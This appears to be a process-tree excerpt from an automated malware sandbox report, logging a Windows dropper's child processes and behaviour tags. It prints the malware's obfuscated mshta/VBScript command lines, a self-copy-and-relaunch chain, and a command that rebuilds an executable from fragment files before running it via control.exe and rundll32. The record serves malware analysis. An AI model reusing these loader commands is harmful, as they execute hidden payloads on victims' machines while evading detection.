-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu164ba03be19.exeThu164ba03be19.exe5⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu164ba03be19.exe6⤵PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu164ba03be19.exe6⤵PID:3608
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
PID:932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:2244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:3560
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:4140
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:4712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:1144
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:3612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2172
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:1848
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:5284
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
PID:3632
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:3576
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4220 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2260
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1240
-
C:\Users\Admin\AppData\Roaming\rcecdgrC:\Users\Admin\AppData\Roaming\rcecdgr1⤵PID:4140